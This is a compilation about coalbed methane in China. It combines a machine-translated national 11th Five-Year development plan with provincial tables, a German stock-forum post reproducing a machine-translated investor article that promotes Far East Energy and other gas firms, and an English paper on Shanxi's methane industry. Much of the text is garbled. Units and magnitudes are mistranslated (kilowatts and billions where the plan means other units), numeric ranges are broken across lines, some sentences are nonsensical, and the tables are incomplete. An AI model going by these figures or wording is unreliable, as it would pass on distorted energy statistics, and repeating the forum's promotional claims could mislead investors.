Currently, CBM mainly for civilian and industrial fuel, power generation, fuel, charcoal production. Among them, the gas generating faster development, and 2005 End, the power generation capacity of about gas 20 Kilowatts. The main domestic gas production and gas generator manufacturers. Shandong Shengli Oil Field Dynamic Mechanical Equipment Plant, Jinan Diesel Engine Factory, Jiangsu Nantong Baoju Group. Industrial gas boilers in the domestic manufacturers. Addison Guangdong, Shanghai's new industry, Qingdao Quartet, Taiyuan Green Granville other.

5, the main problems

( 1 ) The lack of effective support policies

CBM surface development of the initial investment and high output long, slow investment recovery. CBM industry due to lack of supportive policies, the result of inadequate input resources exploration, resource evaluation unsuited to the development needs; CBM development in the initial stage of industrial development initiative is not high; Mine gas enterprises use red, light extraction heavy use of mine gas utilization rate of only average 30% Around.

( 2. ) Enough basic theoretical research and technological innovation

China Coal complicated geological conditions, management and use of gas is very difficult, theoretical and technical aspects, there are many critical problems, such as coal and gas outburst mechanism had not been recognized, some good, forward-looking, basic, and common key technologies, such as safety equipment and technology, personnel, infrastructure to the lack of funds necessary support, particularly in the social welfare research has been significantly weakened, gas control and utilization of the slow progress in technological research and innovation.

( 3 ) Increased the difficulty of coal bed methane extraction

China's high-gas coal mine, especially in Anhui, Henan, Shanxi, Jiangxi, Hunan, Guizhou, Sichuan and Chongqing municipality, coal gas content, high pressure, poor ventilation and extraction difficult. Currently, the average mining depth of key state-owned coal mine 420 M. The mining depth over 1000 M By Zhao Kailuan Coal, Xinwen Mining Suncun and Huafeng, Baoding and the other Xiaobaoding Panzhihua 10 MS Office. With increasing depth of coal mining, gas pressure and stress, gas extraction increased more difficult.

( 4. ) Coalbed methane and coal mining rights overlap

Symbiosis is the same reservoir of coalbed methane and coal mineral resources. At present, various departments and the lack of co-ordination among enterprises, resulting in coalbed methane production and coal mining rights are overlapping, some local coalbed methane extraction and coal mining disharmony is detrimental not only to mobilize the active participation in the development and utilization of coal bed gas, but also in influencing the development of the coal industry.

( 5. ) CBM ( Coalmine ) Use restricted

At present, the CBM ( Coalmine ) Used by many factors. CBM development in the region are. not to go along with the long pipeline, with the result that development is out of tune with the market, for a "point of light days"; The lack of low-density gas transmission and the use of security technology, a large number of low-density gas only after emptying dilution; Gas generation Internet is difficult, access and low prices, power, profit, restrictions on the use of gas extraction; CBM Comprehensive Utilization of the lack of safety management regulations, industry standards and regulatory rules affecting the healthy and orderly development of the coalbed methane industry.

( 6. ) Coalmine directly emptying a greater impact on the environment

CBM ( Coalmine ) Methane is the main component, is about the greenhouse effect of carbon dioxide 21 Times. Coal is the source of methane release 3 Well aspects. First, the release process for mining; Two opencast mining is the process of the release; Third, coal washing, storage, transportation and combustion processes before the smash release. It is estimated that China's coal mining, processing and transportation of gas annually release about 150 Billion cubic meters a greater impact on the environment.

Chapter 2 Development and use of the situation

First, development and utilization of environment is getting better and better

China's abundant coal resources. Conservation priority, inside the country, coal-based, diversified development of China's energy development strategy. In the coming period, the production of coal in primary energy consumption structure and the proportion continues to occupy a dominant position. Symbiotic with coal reserves of coalbed methane resources, with the rapid development of the coal industry and its development prospects are very broad. States attach great importance to energy security, production safety, resource conservation and environmental protection, and further enhance the status of coal as the main energy. With the gradual improvement of the market economic system, the means of macroeconomic control is becoming more and more mature market in the allocation of resources to strengthen the fundamental role that coal operators laws, further improve the policy environment to promote the development of coalbed methane industry has provided a good external environment.

Second, market demand

Coalbed methane gas can be used with the same transmission, providing ample room for development of coal-bed methane industry. According to the forecast, 2010 China's gas demand will exceed 1000 Billion cubic meters of suppliers in the market, a big shortfall. Bohai - rim region and the southeast coastal region, the Yangtze River Delta region, the central region and northeastern region over the natural gas market demand 120 Billion cubic meters /. Is the key areas of China's natural gas consumption. The central region and the Yangtze River Delta region, is a major consumer market of coalbed methane. "11th Five-year Plan" period, the main market of choice CBM in Shanxi, Beijing, Tianjin, Henan and Hebei provinces. CBM resources to meet the needs of the central region, under the premise of the surplus into the east-west pipeline could CBM network to the Yangtze River Delta region.

Underground coal gas use has great market potential. China's coal mines are mostly located in remote areas, as residents used gas fuel, power generation and industrial boilers, for the security of energy supplies in the mining area and its surrounding areas, and improving the consumption structure is of great significance.

Third, resources and network conditions are conducive to large-scale development

China's CBM resources, especially coal-bed methane in north China coal entrusted simple geological structure, high gas content, gas quality, high gas saturation, resource abundance, also adjacent to the economically developed eastern region, has great potential for development.

Pipeline through Xinjiang Coalfield, in southern coalfield, the Ordos Basin, the Qinshui Basin, and western Henan Coal mine so Lianghuai 6 Major coalbed methane-rich region in Shanxi 1.80 Zhengzhou, Henan, Anhui hours Lianghuai have lost population. After the Shaanxi-Beijing pipeline from the northern Shanxi Hedong coalfield, Qinshui Basin north of the woods have I lost hours. Pipeline and the Shaanxi-Beijing pipeline for the development and utilization of coalbed methane resource-rich region provided a good transportation conditions.

Fourth, the development of greater use of technology development

Technology has made considerable progress and development of coalbed methane development ground. Air drilling technology is widely adopted by actively promoting multi-lateral horizontal wells, fracturing monitoring technology, logging technology, rope core technology and faster development. "10th Five-Year Plan" period, promote the use of ground potential measurements, isotopic tracer, micro-seismic and geophysical logging techniques, to improve the coal seam gas content, moisture, ash, hole fracture system to explain the degree of accuracy.

The extraction technology for greater use of coal bed methane development. The widely used in coal extraction, extraction and mined-out area adjacent layer extraction technology, create a more applicable gas extraction technology system. 6%

25% Low concentration gas in underground coal technology for power generation and transmission and security experts to study scientific and technological achievements, to a large-scale use of gas accumulated experience.

Chapter III Guiding ideology, principles and objectives

First, the guiding ideology

Deng Xiaoping Theory and the "Three Represents" important thought and the scientific development concept as a guide, firmly establish the protection of life, resource conservation, environmental protection concepts, adhere to the principle of "safety and prevention first, and comprehensive management" approach, relying on the market to guide, policy-driven, independent innovation, and increase the gas extraction and utilization and to speed up the development of coalbed methane industry. Security mine production safety and increase the supply of clean energy, reduce pollution of the ecological environment and promoting sustainable development of coal industry.

Second, the principle of

( 1 ) Ground and underground extraction phase extraction;

( 2. ) Self-development and external cooperation;

( 3 ) Transportation and the use of more than the nearest gas phase;

( 4. ) And industrial applications using the combination;

( 5. ) Enterprise development combined with the state's support.

Third, development goals

2010. The nation's CBM ( Coalmine ) Output 100 Billion cubic meters, of which the ground coalbed methane extraction 50 Billion cubic meters, utilization 100% ; Underground gas extraction 50 Billion cubic meters, utilization 60% Above. Among the new coalbed methane reserves 3000 Billion cubic meters, coal and coalbed methane gas development and utilization of municipal industrial system.

Chapter 4 Planning, and major tasks

First, CBM exploration

CBM exploration in Shanxi, Shaanxi, Xinjiang, Inner Mongolia and other provinces ( District ) As the focal point, Qinnan, three exchanges, Shaanxi Province, Xinjiang Autonomous, big wells, Erlian Basin, Inner Mongolia and other coal-bed methane exploration project as a foundation to 2010. The new total proven reserves 3000 Billion cubic meters ( Table 4-1) 。

Table 4-1 "11th Five-Year Plan" CBM planning additional proven reserves Unit. 100 million M 3

Province ( District ) 2007. 2008. 2009. 2010.

Then Aggregate Then Aggregate Then Aggregate Then Aggregate

Shanxi 850 850 400 1250 250 1500 600 2100

Total 950 950 400 1350 250 1600 1400 3000

Second, ground coalbed gas development

"11th Five-Year Plan" period, the proven reserves of coalbed methane development with the existing infrastructure, with the market as the guide and technological progress as the means to increase investment, a critical breakthrough towards development by leaps and bounds. 2010. The nation into coalbed methane production 70 Billion cubic meters, producing 50 Billion cubic meters ( Table 4-2) 。

Table 4-2 "11th Five-Year Plan" CBM surface development plan Unit. 100 million M 3

Province ( Autonomous regions and municipalities ) 2006. 2007. 2008. 2009. 2010.

Production Yield Production Yield Production Yield Production Yield Production Yield

"11th Five-Year Plan" period, the focus was on building the ground Qinshui Basin coalbed methane development and the two eastern edge of the Ordos Basin coalbed methane industry base.

( 1 ) Qinshui Basin coalbed methane production base for the industrialization of

Qinshui Basin coal moderate depth (300

1000 M ) And thick, high gas content (19

26 Cubic meters / Tons ). Have a good CBM resources; Stratigraphic occurrence gentle fault small coal cleat development (530

580 Of / M ) And higher permeability (0.5

1.0 Milli dc ). Good geological conditions of the coalbed methane development. Strive 2010. Into production 39.5 Billion cubic meters output 30.5 Billion cubic meters, the new total proven reserves 1500 Billion cubic meters. Qin planning major projects. the South, Fanzhuang, Rood, SHIZHUANG, Shouyang, Panzhuang, Daning, Duanshi.

1 Qin South nation's high-tech industrialization demonstration projects. The project is funded by the state 2004. Flat design Drilling 900. To be completed in three phases. Completion of the first phase drilling 150 I, 2006 Completed, and built production capacity 1 Billion cubic meters of scale; Construction of the second phase of the project 400 I, production reached 4 Billion cubic meters / ; Phase III construction 350 I yield to achieve 7 Billion cubic meters / 2000. "11th Five-Year Plan" period, China completed the development of coalbed methane wells in the ground directly demonstration project.

2 And strategic constituency Duanshi CBM demonstration project. The project is scheduled for construction 5 I multi-lateral horizontal wells, 17 Single-lateral horizontal wells, build production capacity 1 Billion cubic meters of scale. Currently, wells have been completed. "11th Five-Year Plan" period, China built a multi-lateral horizontal wells in the coalbed methane pilot project.

3. The first large-ning gas, coal demonstration projects later. The project is the first successful implementation of multi-lateral horizontal wells population is stable output 2 Million cubic meters. "11th Five-year Plan" period, the construction 2

5 I multi-lateral horizontal wells, build first gas production, coal mining after the demonstration project.

( 2. ) Eastern Ordos Basin coalbed methane production base for the industrialization of

Eastern Ordos Basin coal moderate depth (500

1500m ). The original high permeability ( Generally meeting 1 Milli dc ). Seam thickness ( Monolayer thickness 3

8 M. And the total thickness 8

13m ). High gas content (12

23 Cubic meters / Tons ). Fertilizers, mainly coke, a small, poor, and lean, with favorable geological conditions for the development of coalbed methane. "11th Five-year Plan" period, the completed production 16 Billion cubic meters output 11 Billion cubic meters, the new total proven reserves 900 Billion cubic meters.

Third, the use of coal bed methane extraction

"11th Five-year Plan" period, the coal bed methane extraction to ensure production safety in coal mines to focus on standards and regulations to create a sound system for gas extraction, science and technology research and demonstration projects, and gradually increase the rate of utilization of coal bed methane extraction. 2010. The national gas extraction reached 50 Billion cubic meters more than the rate of extraction 40% Above; Vassili content reaches 30 Billion cubic meters more than the utilization rate 60% Above. Planning large-scale extraction of the province ( Autonomous regions and municipalities ). Shanxi, Liaoning, Anhui, Henan, Chongqing, Sichuan, Guizhou, Shaanxi, Ningxia ( Table 4-3) 。

Table 4-3 "11th Five-Year Plan" national coal mine gas extraction and utilization planning Unit. 10,000 M 3

Province ( Autonomous regions and municipalities ) 2006. 2007. 2008. 2009. 2010.

The extraction volume Utilization The extraction volume Utilization The extraction volume Utilization The extraction volume Utilization The extraction volume Utilization

Hebei 4219 2310 4961 2860 5511 3520 5951 4070 6061 4180

Shanxi 59820 34562 104880 71748 107995 76204 127840 80112 151570 120111

Inner Mongolia 2827 1200 3135 1200 3300 1500 3410 1500 3410 1500

Liaoning 24497 13510 32517 24878 31133 26171 31846 26384 37770 27339

Jilin 1705 330 2184 845 2294 880 2679 1386 3119 1584

Heilongjiang 6356 2642 8056 3830 9346 4449 10676 5132 10986 5267

Anhui 29480 10398 35860 15364 41360 19120 45540 25186 49500 26682

Jiangxi 2640 396 3166 475 3960 594 5146 772 6946 1042

Henan 11000 2387 15000 12718 22000 27298 30000 39365 35000 48670

Hunan 3000 1000 3500 2000 4500 3000 6000 4500 8000 6000

Chongqing 20632 3536 22492 4097 24551 4645 26856 5560 29601 6704

Sichuan 5926 3792 7586 5656 15055 10401 21237 15822 22774 17054

Guizhou 68618 14520 78408 16786 87272 20268 93238 19918 104956 21384

Shaanxi 9031 1300 11318 2947 11648 7260 26754 8162 32692 11264

Gansu 2607 1100 2860 1500 3608 3190 4290 3960 4290 3850

Ningxia 9020 7216 10395 8835 13200 11880 16500 15675 21500 17300

Total 261651 100349 346591 175889 387006 220530 458183 257654 528395 320081

"11th Five-Year Plan" period, the following key management and utilization of coal bed methane demonstration projects.

1 And high gas Heights temperature and high pressure conditions of coal mining extraction and utilization of the gas demonstration project. Choice of mining coal seams, the more serious the danger area, building a secure and efficient exploitation and utilization of the comprehensive management of the gas demonstration project. Comprehensive development of coal bed methane extraction and utilization technologies, gas extraction rate 60% More gas extraction reached 5 Billion cubic meters above; Vassili content reaches 4.5 Billion cubic meters of gas for power generation capacity has reached 10 Kilowatts or more. Basically controlled gas disasters and achieve annual coal mining Face 300 Million metric tons.

2. Highlighted the serious conditions without protective layer mining extraction and utilization of the gas demonstration project. Mining conditions without protective layer mine choice demonstration highlighted the serious, comprehensive development of coal and gas outburst prevention technology, and civilian mine gas extraction, power generation, use of technology. 2010 Achieve effective control of coal and gas outburst disaster without forming a protective layer of gas under the conditions of exploitation and utilization of the comprehensive management of technology and management system, the Model mine gas extraction reached 1.5 Billion cubic meters of gas for power generation and civilian utilization 80% Above.

3. Spontaneous combustion serious high gas extraction and utilization of the gas demonstration project. Choose thick seam mining, mining area for high gas serious spontaneous combustion model, with the development of coal seam gas drilling long extraction technology, gob gas extraction and effective control of goaf spontaneous combustion technology, civilian and gas power generation technology. Gas extraction reached 1.5 Billion cubic meters above extraction rate 60% Above, the gas utilization 80% Above, the basic control goaf coal spontaneous combustion.

4 And building a Coalmine ground, underground extraction and use of comprehensive demonstration projects. Choose thick seam of high gas content area, coalbed methane extraction model first, after coal mining, underground and surface mining extraction pumping combination of technical development and integration, Transportation, the middle and lower reaches of the use of chemical technology. Face to achieve annual coal mining 300 Million tons, effectively control the gas accident, into gas mining, 10 The production capacity of 100 million cubic meters of gas for power generation capacity has reached 12 Kilowatts.

5 And gas extraction and utilization of technology research and demonstration projects and equipment manufacturers. Choice of extraction and use of coal gas in the domestic first-class R & D and manufacturing enterprises, the building of gas extraction and utilization of technology research and demonstration projects and equipment manufacturers. Highlight key development soft coal seam gas extraction and control key technologies and high-yield gas accidents face an early warning system key technologies and key technologies for efficient extraction and gas equipment, reached the advanced international level.

Coal Mine Gas Control informed the Office of the Leading Group for the first half of the inter-ministerial coordination of coal mine gas explosion control the use of indicators and targets completion of extraction CBM (coal bed methane) development and use of the "11th Five-Year" plan (2) CBM (coal bed methane) development and use of the "11th Five-Year" plan (1) Office of the State Council on Accelerating the coalbed methane (coal gas) extraction using a number of views

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Beitrag Nr. 39 ( 24.332.736 )

Antwort auf Beitrag Nr. 24.332.247 von Kursbrecher am 01.10.06 22:51:21 Jetzt aber mal was ganz aktuelles vom 22 August:

China'’ s Energiekrise eine günstige Gelegenheit für Kohlenlager-Methan-Produzenten mögen Ferner Osten Energie Bekanntgegeben am 22. Aug. 2006 mit Aktien: FEEC

James Fink reicht ein: China ’ ' s ist wachsende Energiekrise ein Grund der Preis des öls, Erdgas und andere Gebrauchsgüter hat die Preiskalkulation auf höheren Niveaus unterstützt. Die country'’ s explosionsartig vermehrende mittlere Kategorie, mehr als 300 Million jetzt numerierend, war für das red-hot GDP Wachstum zur Hälfte erste von 2006 stark verantwortlich, das seine Nachfrage für mehr Energie erhöhte. Nach einer Dekade des Suchens nach neuen Energiequellen um die Kugel, versucht der world'’ s an zweiter Stelle größte Energieverbraucher jetzt, seine Betriebsmittel durch weitere öffnung seine Türen zu den Auslandsgesellschaften auch zu entwickeln.

Weil China ungefähr 70 Prozent seiner Energie für das Antreiben der Land ’ s Wirtschaft von der Kohle zeichnet, wenden die Chinesen schwerer an das unkonventionelle Gas, bekannt als Kohlenlagermethan [CBM]. Mehr als 30.000 Kohlengruben, die Methangas freigeben, sind für ungefähr 40 Prozent China ’ ' s Luftverschmutzung verantwortlich. Methangasexplosionen verursachen den Todesfällen von mehr als 6.000 chinesischen Kohlebergmännern jedes Jahr. Bis vor kurzem war das Methan eine Beeinträchtigung Nebenerscheinung, die recklessly in die Atmosphäre gelüftet wurde. Durch das Gefangennehmen des Gases, vor Gruben Anfang, Kohle produzierend, den Welt’ s größten Kohleproduzenthoffnungen, die Leben zu speichern und Luftverschmutzung beim Verwenden des Methans zu verringern als eine andere Energiequelle.

Integral zum China ’ ' s 11. Fünfjahresplan ist die Verdoppelung des Erdgasgebrauches in Energie-mischen bis zum 2010. Konkurrenzfähige chinesische Politik und Pläne hoffen, mehr Gasverbrauch Ende der Dekade aufzuladen. Indem sie Auslandsgesellschaften große Kohlenlagermethanzugeständnisse zusprechen, um in den chinesischen Provinzen zu erforschen, beschleunigen China Hoffnungen Entwicklung dieser Energiequelle. Nachdem dem Anziehen der Gleichen des Sparrens (CVX) und des ConocoPhillipss (SPINDEL), China'’ s staatseigenes China vereinigtes Coalbed Methane Company [CUCBM] fing an, anzubieten, Verträge mit weniger bekannten Namen Produktion-teilend.

Obgleich viel kleinere Firmen – zum Beispiel, Ferner Osten Energy Corporation (FEEC) – jedes Anschlüsse innerhalb Chinas hatte, zum des massiven CBM Gas-Zugeständnisse – zu erreichen einige ungefähr Drittel die Größe von Rhode-Island. Ferner Osten Energie, deceivingly klein als Energiefirma (Marktkappe: $136 Million), sich entwickelt seinem Verhältnis zu CUCBM durch vorhergehende politische Anschlüsse. Hauptgeschäftsführer Michael McElwrath diente kurz als verantwortlicher Assistent USminister fuer Energie für versteinerte Energie unter Präsidenten George Bush, Sr. Finanzleiter Bruce ärger war früher Präsident und funktionierender Hauptoffizier von Harken Energie, eine Firma, mit der Präsident Bush, jr. beteiligt war. Ein technischer Berater, zieht Gunther, war früher Vorsitzendes der Bechtel Gruppe, eine Firma an deren Schüler die Reagan und Bush Leitungen bevölkerten.

War im Ferner Osten Energie ’ ' s Fall, der Pflaumepreis ein 1.3 Millionmorgen Zugeständnis China ’ s in der Kohle reiche Shanxi und Yunnan Provinzen. Die Eigenschaften haben mögliches wiedergutzumachendes CBM Hilfsmittel von zwischen 9.2 und 12.5 Trillion Kubikfuß. Sie werden nahe zwei nationalen hauptsächlichrohrleitungen aufgestellt, die nach Beijing und Shanghai laufen. Entsprechend der Firma ’ s Web site wenn das Shanxi Projekt völlig entwickelt wird, könnte es geschätzte 3.000 horizontale Gases unterstützen Brunnen eines. Wenn dieses ’ s der Fall, dieser eins der Welt’ s größten CBM Projekte werden konnte.

Vorsitzender John Mihm war ein älterer Vizepräsident für Kreuzkopferdöl, vor der Firma ’ s Fusion mit Conoco gewesen und wurde miteinbezogen, wenn er technische Unterstützung für das ConocoPhillips Shanxi Projekt lieferte, bevor es heraus zur Ferner Osten Energie bewirtschaftet wurde. Wenn ConocoPhillips nur auf einer Überlaufenabgabe Grundlage teilnahm, dann wurde Ferner Osten Partner mit CUCBM und 66.5 Prozent von Shanxi zu besitzen. Wenn ConocoPhillips teilnimmt, würde Ferner Osten ein 40-Prozent-Interesse behalten.

Testbrunnen bohrten auf zwei der Firma, ’ s, das Blöcke bis jetzt den Gasinhalt angezeigt haben, der zwischen 280 und 650 Kubikfuß pro Tonne Kohle sich erstreckt. Diese Ausgangsresultate vergleichen vorteilhaft mit zwei der reichsten CBM Bassins im Vereinigte Staaten, New-Mexico ’ s San Juan Bassin (300 – 700 Cu ft/ton) und Alabama ’ s schwarzes Krieger-Bassin (250 – 500 Cu ft/ton). Entsprechend Ferner Osten Energie zeigten interne ConocoPhillips Dokumente starke Versprechung und sagten, daß die “ Kohle gut befestigt wurde und Kohleproben hohen Gasinhalt haben. ” eins Schlüsselfaktor, wenn er ein CBM Spiel auswertet, ist die Stärke der Kohlenähte. Bei Shanxi berechnen vier Kohlenähte 9 Fußes stark mit Gesamtmenge von 60 Fuß in der Kohlenlagerstärke.

War das Sein ein vorhergehender Direktor von Ferner Osten Energie, Tunaye Sai in der Lage, seine eigenen Anschlüsse in China zu entwickeln. Dieses führte zu seins, welches wieder über das Guizhou CBM Zugeständnis im zentralen China Süd– ein anderer enormer Block von 970 quadratischen Kilometern – verhandelt, das durch kanadische gegründete AsiaCanada Energie erworben wurde. Dieses wurde eine insgesamt besessene Tochtergesellschaft der pazifischen Asien China Energie, von der er als Präsident dient und von der auf, anfing dem Toronto Wagnis-Austausch Staatshandel, dieser letzte Januar.

Sein Zugeständnis war eine kanadische Firma zuerst zugesprochen vom Chinesen, der vorher nur US und Australisch-gegründete Firmen beschäftigt hatte. Seit damals hat China drei zusätzlichen kanadischen Firmen Zugeständnisse zugesprochen. Wieder schwankt der mögliche Gasinhalt dieser Zugeständnisse. Im Falle des Guizhou Zugeständnis könnte er ein Hochschachtel Drehbuch von 11.2 Trillion Kubikfuß Gas möglicherweise bewirten. In einem Interview, das wir mit Eric Nuttall, CBM Forschung Analytiker für Canada'’ s Sprott Vermögensverwaltung, er leiteten, schätzte für jede Trillion Kubikfüße Gas, eine Firma konnte eine Marktkapitalisierung wie $1 Milliarde so stark vorwegnehmen. Die meisten CBM Firmen, die Aussichten in China, wie Ferner Osten Energie und pazifischer Asien China Energie entwickeln, sind wahrscheinlich, wegen des Länderrisikos ein wenig diskontiert zu werden.

Nicht so für grünes Drache-Gas, das diese letzte Woche auf London ’ s ZIEL-Markt (GDG) verzeichnete, mit einer Marktkapitalisierung von US$525 Million. Es setzte gerade unter sechs Prozent seiner Anteile, um $22 Million anzuheben. Grüner Drache hält fünf Produktion-teilende CBM Verträge, die ca. 1.6 Million Morgen Fengcheng und Shizhuang in den Provinzen bedecken. Es wird ihren Holdings kann 16.6 Trillion Kubikfuß CBM Gas bewirten geschätzt. Es scheint, daß der europäische Investor China ’ s zu den Aussichten als die in Nordamerika savvier ist. Dieses wurde während eines Interviews mit Executivvizepräsidenten Steve Khan, der der pazifischen Asien China Energie uns erklärte, “, wenn wir die London Fonds-Geschäftsführungen besuchen, sie anzieht ’ t haben Negativ oder eine wenige Ansicht von China widergehallt. Sie betrachten es als große Gelegenheit und sie ’ bezüglich der Investierung mehr finanzieren dort. ”

Die Nuancen der Investierung im Erdgas oder DER CBM Spiele außerhalb Nordamerikas können einigen Investoren entgehen. Nicht viele stellen fest, daß alles Gas lokal ist. Z. B. ist das Erdgas, das an der Hauptquelle in Australien oder im Mittlere Osten verkauft wird, ein Bruch der Kosten, die nach England oder in Nordamerika verkauft werden. Während die Firmen, die CBM Betriebsmittel in China entwickeln, einen Diskont zu ihren nordamerikanischen Gegenstücken tragen, ist die Preiskalkulation im chinesischen Gasmarkt beständiger.

Wir sprachen mit Hilfsmittel-Gelegenheiten Herausgeber und Geologe Lawrence Roulston, der uns erklärte, „“, das ich denke, daß die Firmen, welche sind, die CBM Technologie in China effektiv auszunutzen, sein werden die Pioniere in diesem Bereich. „Den in ausländischem Besitz Firmen ” bis jetzt, weniger als 30 Zugeständnisse sind durch CUCBM zugesprochen worden. Haben gewesen die fliegenden Gerüchte, daß eine anderen fünf bis 10 im kommenden Jahr zugesprochen werden können. Wie häufig der Fall in China, fing das Bürokratiebewegungen langsam – CUCBM an, CBM Zugeständnisse 1998 in Form von Produktion-teilenden Verträgen zuzusprechen. Behandelt wie gewinnende Lotteriekarten, auf Durchschnitt weniger als vier pro Jahr sind ausgeteilt worden. CUCBM hält zwischen 30 und 40 Prozent des Produktion Vertrages, und die Verwertungsgesellschaft zahlt alle forschenden Bestätigung Kosten vor Produktion.

Wieder ist sie über Haben der Anschlüsse mit den richtigen Leuten in China. Erklärtes Roulston, “ könnte ich in die Erdöl-Verein in Calgary gehen und treffe ein halbes Dutzend Kerle und spreche mit ihnen. Ich könnte auf meinen Leitungen errichten, und vermutlich an einem Tag spricht über ein Abkommen. Wenn du in China einsteigst, es sei denn du jemand auf deiner Mannschaft hast, die in das System und in das Abkommen mit den Leuten erhalten kann, wegen der Sprache gibt, kulturelle Ausgaben und Zugang zu den Informationen gerade haben und wissen heraus, welche Art nach der Bezeichnungen, denen sie suchen konnten. ”, das er folgerte, “, wenn ich zu China und zu Versuch darüber hinausgehen sollte, zum eines Abkommens zu tun, um Zugang zu einer Kohlenlagermethaneigenschaft zu erhalten, I wouldn ’ t haben einen Anhaltspunkt über, wie man anfängt. ”, das ’ s was die Firmen trennt, denen ’ ihr CBM angefangen haben, in China projiziert und warum sie hervorragende langfristige Aussichten haben konnten.

FEEC 1 Jahr Diagramm:

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Antwort auf Beitrag Nr. 24.444.346 von Obertor am 06.10.06 16:55:58 Schöner Bericht über das Gasnetzwerk

A Tentative Plan for CBM Industry Development in Shanxi Province

Yi Qinglin Chang Jianglin (Shanxi Provincial Development and Planning Commission, Taiyuan 030002)

Abstract Coalbed methane is an advantageous resources of Shanxi Province. The development of coalbed methane will be of great economic, social and ecological benefits. Facing the increasingly severe market competition, Shanxi Province must bring into full play its own advantages by large-scale development of CBM industry. The authors display their strategic imaginations and development blueprint including the layout of the pipeline networks and predict the goals for different development stages as well as put forward suggestions for policy preparation. The authors also emphasize that every effort should be made to turn the Province of Shanxi into a ¡°silicon valley¡± in the development of CBM industry in China.

Foreword Coalbed methane is the natural gas generating from coal seams. It is of great use either because it is a cleaner energy or because it is an important chemical raw material. Development and utilization of coalbed methane began as early as half century ago. However, it is until the ¡¯70s of this century in the United States that development of coalbed methane as resources took a debut. The more than 2-decade long R&D, exploration and development have produced ideal economic, social and ecological benefits. By now, coalbed methane has become a heated point in new energy development that many countries in the world are wooing.

Data show that the world total coalbed methane resources in the shallow strata within the depth of 2000m is about 240 trillion m3 while coalbed methane in China is about 30

35 trillion m3, the world¡¯s third after Russia and Canada and about three time that of the U. S.A. It is notable that the coalbed methane resources in Shanxi Province proper is about the same quantity as that of the U. S.A.

For a long time in the past, Shanxi Province has been entirely devoted to the production of large quantities of energy to ensure the fast economic development of the nation and earlier realization of the re-doubling of the national economy of China. In face of severe competition under the socialist market economy conditions, Shanxi Province must bring its advantages into full play by nursing its own new industrial sectors and by developing and utilizing clean energy so as to realize a stronger economic development. Development of coalbed methane in Shanxi Province is probably the best choice in this respect.

2. Necessity of coalbed methane industry development in Shanxi Province It is a well-known fact that the Province of Shanxi has achieved greatly in economic development, improving the living standards of the people as well as in other fields. At the same time, however, many problems remain unsolved. The obvious point is that the comparative advantages in the conventional industries have become less outstanding because of the low economic returns of the extensive economic growth pattern that are always operated on larger scale. Besides, the serious ecological damages and environmental pollution have presented threat to the sustainable development of the economy and society as a whole. Under this context, it becomes more and more important to develop some carefully selected new and high technologies and cultivate some new economic growth areas. As high and new technologies in the new industrial sectors, coalbed methane development deserves the great attention by the Province of Shanxi.

2.1 Coal mining to be decelerated to protect the eco-environment In Shanxi Province that is rich in mineral resources, the over-intensive mining has resulted in increasingly serious environmental pollution and ecological damages, etc. The development and utilization of coalbed methane can help decelerate the over-intensive coal mining and reduce the methane emission in the course of coal mining. This is undoubtedly helpful to the protection of the eco-environment.

2.2 Speeding up the pace of readjustment of industrial structure The economy of Shanxi Province mainly relies on the development of resources. Under the socialist economy conditions, the economy of Shanxi is faced with many difficulties. The first is the industrial product structure is mainly based on primary products; the second is there is only one pillar industry and the third is the economy relies heavily on extensive growth pattern. So, it is of urgent importance to identify and cultivate new areas of economic growth and economic development sectors. Coalbed methane stands out brilliantly because of its wider applications and great potentials in development. The utilization of coalbed methane can produce a series of technology intensive chemical products with higher added value. The pillar industrial sectors formed therefrom can promote the development of other relevant industries, hence speeding up the readjustment of industrial structure and upgrading of products.

2.3 Facilitating Shanxi¡¯s enlarged contacts with the outside world As an in-land province, Shanxi is backward in contacts with outside world. The development of coalbed methane will bring about new opportunities to Shanxi. It is a well-known fact that Shanxi is the state government designated key region for coalbed methane exploration as well as a key region for coalbed methane development and utilization. The state government input into Shanxi for CBM development will also help draw the interests from foreign investors. Coalbed methane development will further widen the areas for economic cooperation with foreign countries and other provinces which is a great impetus to Shanxi Province¡¯s contacts with the outside world and economic development in this Province.

2.4 Speeding up poverty extrication and better-off in poverty stricken areas Shanxi is a province with underdeveloped economy with comparatively more poverty stricken population. Coalbed methane rich areas in this province are mainly difficulty stricken areas. The CBM development in Shanxi Province will surely foster the local economy hence speeding up the pace of poverty extrication in the poor areas.

2.5 Favorable for safety in coal mines Coal mine gas is one of the sources of deadly disasters in underground coal mining operation. Great losses in human life and economic loss is caused every year in the coal mining sector of Shanxi Province. Pre-drainage or extraction of coalbed methane in a well planned manner will greatly reduce the methane content in coal seams hence avoiding the occurrence of methane related accidents. This is of great significance to coal mine safety and improved mining economy.

2.6 Adding to cleaner energy and improving energy structure Coal is the major source of energy of Shanxi Province. The province consumes an annual amount of nearly 100Mt of coal. SO2 and dust resulting therefrom cause very serious pollution to the atmospheric environment. The development of coalbed methane will turn coal burning into gas burning and thus zero emission will be realized.

3. The possibilities of realization of CBM industry 3.1 Shanxi Province is rich in coalbed methane resources Resources is the material foundations for the formation of a resources based industry. Research and exploration over the recent years show that Shanxi Province is rich in coalbed methane resources that is easy to extract and of higher quality. Preliminary prediction shows that coalbed methane resources in Shanxi in the shallow part strata within the depth of 2000m is totaled at around 10 trillion m3, accounting for one third of the national total. Qinshui area and Hedong coalfield are especially rich in coalbed methane with their reserves of 6.85 trillion m3 and 2.84 trillion m3, respectively. These two coalbed methane bearing areas are all comparable with the famous coalbed methane rich basins called San Juan Basin and Black Warrior Basin in the U. S.A. suitable for large scale commercialized CBM development.

3.2 CBM development and utilization technology is getting mature 3.21 CBM exploration and development technology adapted to the particular conditions in China is improving The reason why coalbed methane mining has not yet entered into commercial scale development is partly because there is not yet a ready and appropriate technology for use. As a result of the R&D activities by some domestic institutions concerned, a set of CBM extraction and cracking technology adapted to the geological conditions in China has come into being. Experiments with this technology in 12 CBM wells in the exploration areas of Huainan in Anhui Province, Anyang in Henan Province, Liulin in Shanxi Province and Hancheng in Shaanxi Province have all produced optimal result of 100% success. The more than 30 CBM wells under construction in the southern part of Qinshui Basin in Shanxi Province have been proved of over 90% of success and they are now in very smooth process of CBM production. Viewing the present situation, we have generally mastered the surface CBM drainage and extraction technology adapted to the actual conditions in the Province and in this country and the technology concerned is becoming more and more mature. While the underground CBM extraction technology has long been mastered by us and has been widely applied in areas such as Yangquan and Jincheng, etc.

